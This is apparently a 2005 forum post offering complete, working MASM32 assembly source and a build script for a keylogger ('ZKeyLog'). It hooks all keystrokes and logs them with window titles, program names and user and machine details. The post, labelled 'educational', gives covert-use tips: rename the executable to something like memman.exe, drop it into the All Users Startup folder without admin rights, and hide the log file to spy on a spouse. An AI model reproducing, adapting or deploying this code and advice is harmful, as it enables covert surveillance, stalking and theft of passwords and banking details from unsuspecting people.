********************************************************************************************
The Programs and Files included are Copyright 2005, by ZOverLord
This is a Proof Of Concept for Educational Purposes ONLY!
Notes:
This program is 4K big, as in 4,096 bytes and can do ANYTHING other Key-Loggers
claim, this is Version 1.0, a Stealth version will be next to show Hiding concepts.
The program was created because MANY people claimed that you could NOT use a
Stand-Alone program ("Without the Global hook procedure being located in a DLL") to do low-level
keyboard Key-Logging. As I say.....
"We Don't NEED NO STINKIN DLL!"
The program(s) "They both produce the same output, one is Raw ASM and the other uses
INVOKES. This was done in order to try and HELP others learn ASM a little
better, instead of trying to make ASM look like some FRICKEN C++ MACRO from HELL Language, lol
In any event, the RAW version has more comments if your trying to figure out
how the MAGIC is done. There is some MASS confusion with MANY seasoned programmers
as to just HOW to get some Data, when the process is NOT in your CONTEXT.
LOL, Hope this helps BOYS! Ok, you need the latest and greatest MASM32 if you want
to compile this and LEARN SOMETHING! Download and install it from here:
http://website.masmforum.com//masm32/m32v82r.zip
Once you have done that you can click on the C:\ZKeyLog\ZKeyLogV1.bat file and
it will build BOTH versions, as well as compile an addtional Library needed in
msvcrt.inc, which will create a msvcrt.lib file in the c:\ZKeyLog folder as well.
No matter if you re-compile the programs or not the following directions will help.
Decide which of the two versions you wish to use, if needed to be more Stealth like
make a copy of either ZKeyLogV1Raw.exe or ZKeyLogV1.exe and rename it to something
which won't raise EyeBrows like memman.exe, for example.
REMEMBER, anytime you do Key-Logging you run the RISK of IF someone gets into
your system and the log contains sensitive data such as bank account info or
passwords, you could cause Your Self some MAJOR Grief, we take NO responsibility
on the use of this. You maybe better off re-compiling this and change the log
file to ANOTHER name, just in case this Key-Logger gets Popular, and people start
to look for the log name.
Now, IF the program is NOT placed in a StartUp Folder the LOG will be in the
same folder as the program is run, again the DEFAULT log name is ZKeyLog.txt.
If the program is placed in a Startup Folder, it will be in the Default PATH of
that user. So for example if you placed the program in the ALL Users Startup
folder, then each user would have a LOG file called ZKeyLog.txt in their default
path.
You can HIDE the log file by setting the file to be hidden, this way users will
not know it is there, like your Cheating Wife or Husband for example ;-)
If you have any Questions, open the ZKeyLogV1Raw.asm file in notepad, it has more
comments than the ZKeyLogV1.asm file. If you are still STUCK and need answers
email me at ZOverLords@Yahoo.com.
Enjoy, I hope this helps others learn the ASM Language, It is amazing on what you
can do with ASM with such a small FootPrint. Enjoy!
First, you will need to build a NEW library that is not currently in MASM32 called msvcrt.lib from this file called msvcrt.inc:
fopen PROTO C :DWORD, :DWORD
fprintf PROTO C :DWORD, :VARARG
fflush PROTO C :DWORD
fclose PROTO C :DWORD
Second, the .bat file to build the msvcrt.lib as well as ZLogKeyV1.exe the Higher-Level MASM32 version which uses INVOKES as well as ZLogKeyV1Raw.exe which is a RAW MASM32 Low-Level MASM32 source.
Here is the .bat file called ZKeyLogV1.bat
: Set the masm path
SET MASMPATH=C:\masm32
%MASMPATH%\tools\inc2l\inc2l msvcrt.inc
%MASMPATH%\bin\ml /c /coff ZKeyLogV1.asm
%MASMPATH%\bin\polink /release /subsystem:windows /MAPINFO:EXPORTS /MAPINFO:FIXUPS /MAPINFO:LINES /VERBOSE /MACHINE:IX86 /libpath:%MASMPATH%\lib ZKeyLogV1.obj
%MASMPATH%\bin\ml /c /coff ZKeyLogV1Raw.asm
%MASMPATH%\bin\polink /release /subsystem:windows /MAPINFO:EXPORTS /MAPINFO:FIXUPS /MAPINFO:LINES /VERBOSE /MACHINE:IX86 /libpath:%MASMPATH%\lib ZKeyLogV1Raw.obj
pause
Third, here is the Low-Level MASM32 source, which is called ZKeyLogV1Raw.asm
;*******************************************************************************************
; (BEST Viewed with NOTEPAD)
; CopyRight 2005, by ZOverLord at ZOverLords@Yahoo.com - ALL Rights Reserved
;
; "We Don't NEED no STINKIN DLL!"......ENJOY! vist http://testing.OnlyTheRightAnswers.com
;
; Proof Of Concept of using Low-Level Hooks without using any DLL for the Hook
; This Program is for Educational Proof Of Concept Use ONLY!
;
; This Program compiles in 4K, get it that's 4,096 Bytes. I got TIRED of all these folks
; who need a FAT program as well as a FAT DLL to create a Key-Logger so in frustration
; this proof of concept was created. Log Items include:
;
; Date-Time Stamps, Program Name, Window Title, Window Class, Domain Name, Computer Name
; User Name as well as the ability to be placed in StartUp Folders for ANY and/or ALL
; users. There is NOT any requirement for this to run as ADMIN, ANYONE can place it in
; the startup folder of any user, or for all users.
;
; The Logfile is named ZKeyLog.txt and seperate logs can be kept for seperate users this
; can be done automatically by simply placing the program in the:
;
; C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder
;
; C:\Documents and Settings\?USER?\ folder as ZKeyLog.txt
; ("You can change the File to Hidden if needed")
;
; A Hot-Key of [CTRL]-[ALT]-[F11] will turn the Key-Logger Off
;
; There are two flavors one Raw ASM and one using INVOKES, Raw has more comments, low-level.
;
; You can rename the EXE file to something NOT so obvious if needed, read the AReadMe.txt
;
;*******************************************************************************************
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\advapi32.inc
include msvcrt.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\advapi32.lib
includelib msvcrt.lib
pushz macro szText:VARARG
local nexti
call nexti
db szText,00h
nexti:
endm
.data
CopyRight db "CopyRight 2005, ZOverLords@Yahoo.com"
Vist db "http://testing.OnlyTheRightAnswers.com "
hBuffer dd ?
hComputerName db 32 dup(0)
hCurrentThreadPiD dd 0
hCurrentWindow dd 0
hDateFormat db "dd MMM yyyy", 0
hDomaineName db 128 dup(0)
hFile dd 0
hHook dd 0
hmodul MODULEENTRY32 <>
hSnapShot dd 0
hTimeFormat db "hh:mm:ss tt", 0
hUserName db 32 dup(0)
msg MSG <>
onlyOneCopy db "Global\zkl",0
.code
main:
push offset onlyOneCopy ; check to make sure we are the only copy
push 0 ; of this program running for this user
push 0 ; for fast user switching we can still have
call CreateMutexA ; one copy per user running with this check
call GetLastError ; but if this user is running one already. we exit
cmp eax,ERROR_ALREADY_EXISTS
je more_than_one_copy
xor ebx, ebx ; Zero Out ebx
push VK_F11 ; this will switch logger off using CTRL+ALT+F11 together
push MOD_CONTROL or MOD_ALT
push 0badfaceh ; name of register key -> "0BADFACE"
push ebx ;
call RegisterHotKey ; we got a new hot key
pushz "ab" ; append in binary mode
pushz "ZKeyLog.txt" ; name of log file
call fopen ; open the log file
add esp, 2*4 ; all c lib functions need fixup..
mov [hFile], eax ; save our file number
push ebx
call GetModuleHandleA ; get our module handle for setting the hook
push ebx ; register our keyboard hook proc and start hooking
push eax
push offset KeyBoardProc ; where our hook proc is located
push WH_KEYBOARD_LL ; low level key logger WH_KEYBOARD_LL = 13
call SetWindowsHookExA ; Look MOM no DLL Needed :P
mov [hHook], eax ; ok here is our hook handle for later
push ebx ; We Need to check for messages like our
push ebx ; hot key, so we can close when we get it
push ebx
push offset msg ; it will be in the message struct
call GetMessageA ; wait for a message
push [hHook] ; we got the hot key, lets close up house
call UnhookWindowsHookEx ; make sure we unhook things to be nice
push [hFile] ; close our logfile before we stop
call fclose
add esp, 04
more_than_one_copy:
push eax ; call stop and lets go away
call ExitProcess
;##############################################################
KeyBoardProc PROC nCode:DWORD, wParam:DWORD, lParam:DWORD
LOCAL lpKeyState[256] :BYTE
LOCAL lpClassName[64] :BYTE
LOCAL lpCharBuf[32] :BYTE
LOCAL lpDateBuf[12] :BYTE
LOCAL lpTimeBuf[12] :BYTE
LOCAL lpLocalTime :SYSTEMTIME
;----------------------------
lea edi, [lpKeyState] ; lets zero out our buffers
push 256/4
pop ecx
xor eax, eax
rep stosd ; sets us up for doubleword from EAX
mov eax, wParam
cmp eax, WM_KEYUP ; only need WM_KEYDOWN
je next_hook ; bypass double logging
cmp eax, WM_SYSKEYUP ; only Need WM_SYSKEYDOWN
je next_hook ; bypass double logging
call GetForegroundWindow ; get handle for currently used window ( specific to NT and after )
cmp [hCurrentWindow], eax ; if its not different to last one saved..
je no_window_change ; bypass all the headings
mov [hCurrentWindow], eax ; save it for use now and compare later
push 64 ; get the class name
lea esi, [lpClassName]
push esi
push [hCurrentWindow]
call GetClassName
lea esi, [lpLocalTime] ; invoke GetLocalTime, ADDR LocalTime
push esi
call GetLocalTime
push 12 ; invoke GetDateFormat, NULL, NULL \
lea esi, [lpDateBuf]
push esi ; ADDR lpLocalTime, ADDR hDateFormat \
lea esi, [hDateFormat]
push esi ; ADDR lpDateBuf, Size of 12
lea esi, [lpLocalTime]
push esi
push 0
push 0
call GetDateFormat ; format the date
push 12 ; invoke GetTimeFormat, NULL, NULL \
lea esi, [lpTimeBuf]
push esi ; ADDR lpLocalTime, ADDR hTimeFormat \
lea esi, [hTimeFormat]
push esi ; ADDR lpTimeBuf, Size of 12
lea esi, [lpLocalTime]
push esi
push 0
push 0
call GetTimeFormat ; format the time
lea esi, [hCurrentThreadPiD] ; get the processid that sent the key
push esi ; using the HWND we got earlier from
mov eax, [hCurrentWindow] ; our GetForegroundWindow call
push eax ; we need it to get the program exe name
call GetWindowThreadProcessId
mov ebx, hCurrentThreadPiD ; remember we are NOT using a DLL so.....
push ebx ; we need to use ToolHelp procs to get
push TH32CS_SNAPMODULE ; the program exe name of who sent us
call CreateToolhelp32Snapshot ; this key
mov hSnapShot,eax ; save the ToolHelp Handle to close later
mov hmodul.dwSize, sizeof MODULEENTRY32; need to initialize size or we will fail
push offset hmodul ; first Module is always module for process
mov eax, [hSnapShot] ; so safe to assume that the exe file name here
push eax ; will always be the right one for us
call Module32First
mov eax, [hSnapShot] ; we are done with ToolHelp so we need
push eax ; to tell it we wish to close
call CloseHandle
push 256 ; find the window title text
lea esi, [lpKeyState] ; use lpKeyState it's not being used yet so
push esi
mov eax, [hCurrentWindow] ; using the HWND we got from GetForegroundWindow
push eax
call GetWindowText
push offset hmodul.szExePath
lea esi, [lpTimeBuf] ; print the formatted time
push esi
lea esi, [lpDateBuf] ; print the formatted date
push esi
pushz 13,10,"[%s, %s - Program:%s]",13,10
push [hFile]
call fprintf ; write the buffer to cache
add esp, 3*4
lea esi, [lpClassName] ; print the Window Class Name
push esi
lea esi, [lpKeyState] ; print the Window Title
push esi
pushz 13,10,"[ Window Title:%s - Window Class:%s]",13,10
push [hFile]
call fprintf ; write the buffer to cache
add esp, 3*4
mov hBuffer, 128 ; get the current domain name
push offset hBuffer
push offset hDomaineName
push 1
call GetComputerNameExA
mov hBuffer, 32 ; get the current computer name
push offset hBuffer
push offset hComputerName
push 0
call GetComputerNameExA
mov hBuffer, 32 ; get the current user name
push offset hBuffer
push offset hUserName
call GetUserNameA
push offset hUserName ; print the user name
push offset hComputerName ; print the computer name
push offset hDomaineName ; print the domain name
pushz "[ Domain:%s - Computer:%s - User:%s]",13,10
push [hFile]
call fprintf ; write to cache
add esp, 3*4
push [hFile]
call fflush ; flush data buffer to disk..
add esp, 4
no_window_change:
mov esi, [lParam] ; we don't want to print shift or capslock names.
lodsd ; it just makes the logs easier to read without them.
cmp al, VK_LSHIFT ; they are tested later when distinguishing between
je next_hook ; bypass left shift Key for upper/lowercase characters
cmp al, VK_RSHIFT
je next_hook ; bypass right shift Key
cmp al, VK_CAPITAL
je next_hook ; bypass caps lock Key
cmp al, VK_ESCAPE
je get_name_of_key ; we Want escape characters
cmp al, VK_BACK
je get_name_of_key ; we want backspace key
cmp al, VK_TAB
je get_name_of_key ; we want tab key
;------------------
lea edi, [lpCharBuf] ; zero initialise buffer for key text
push 32/4
pop ecx
xor eax, eax
rep stosd
;----------
lea ebx, [lpKeyState]
push ebx
call GetKeyboardState ; get current keyboard state
push VK_LSHIFT ; test if left shift key held down
call GetKeyState
xchg esi, eax ; save result in esi
push VK_RSHIFT ; test right..
call GetKeyState
or eax, esi ; al == 1 if either key is DOWN
mov byte ptr [ebx + 16], al ; toggle a shift key to on/off
push VK_CAPITAL
call GetKeyState ; returns TRUE if caps lock is on
mov byte ptr [ebx + 20], al ; toggle caps lock to on/off
mov esi, [lParam]
lea edi, [lpCharBuf]
push 00h
push edi ; buffer for ascii characters
push ebx ; keyboard state
lodsd
xchg eax, edx
lodsd
push eax ; hardware scan code
push edx ; virutal key code
call ToAscii ; convert to human readable characters
test eax, eax ; if return zero, continue
jnz test_carriage_return ; else, write to file.
get_name_of_key: ; no need for large table of pointers to get asciiz
mov esi, [lParam]
lodsd ; skip virtual key code
lodsd ; eax = scancode
shl eax, 16
xchg eax, ecx
lodsd ; extended key info
shl eax, 24
or ecx, eax
push 32
lea edi, [lpCharBuf]
push edi
push ecx
call GetKeyNameTextA ; get the key text
push edi
pushz "[%s]" ; print the special key text
jmp write_to_file
test_carriage_return:
push edi
pushz "%s" ; print regular keys
cmp byte ptr [edi], 0dh ; carriage return?
jne write_to_file
mov byte ptr [edi + 1], 0ah ; add linefeed, so logs are easier to read.
write_to_file:
push [hFile] ; where we write to the log file
call fprintf
add esp, 2*4
next_hook:
push [lParam] ; reply for possible other hooks waiting
push [wParam]
push [nCode]
push [hHook]
call CallNextHookEx
ret
KeyBoardProc ENDP
end main
Sample Log Output
[26 Dec 2005, 02:18:25 PM - Program:C:\Program Files\Internet Explorer\iexplore.exe]
[ Window Title:broadband » Forums » Security » Whats the best software to monitor my kids..... - Microsoft Internet Explorer provided by Compa - Window Class:IEFrame]
[ Domain:BillyBobs - Computer:Billy - User:Bob]
http://www.codeguru.com
[26 Dec 2005, 02:18:36 PM - Program:C:\WINDOWS\system32\cmd.exe]
[ Window Title:Command Prompt - Window Class:ConsoleWindowClass]
[ Domain:BillyBobs - Computer:Billy - User:Bob]
dir
[Ctrl][Alt][F11]
[Ctrl][Alt][F11] is a Hot Key sequence that stops the Key Logger
Note that the all files in this project have been attached in zip are format.
All project source and the build file as well as a readme file have been included.
Both compiled versions of the program are included as well.
MASM32 version 8.2 was used to compile this, which is located ("For Thoses that don't know") at:
http://www.masm32.com/masmdl.htm
Please let me know what you think, the goal was to try and show others how easy it is to use Low-Level Global Hooks without needing a DLL and to show how to get data from other programs that are not in your context when using Global Hooks and no dll.
This example can be used as a baseline for similar code in C++, there really is no requirement to understand ASM or MASM32 for that matter to see how this works.
Any Comments or Questions Please ask or Post. If you think this example ROCKS, please rate this thread, again thanks
Thanks
ZOverLord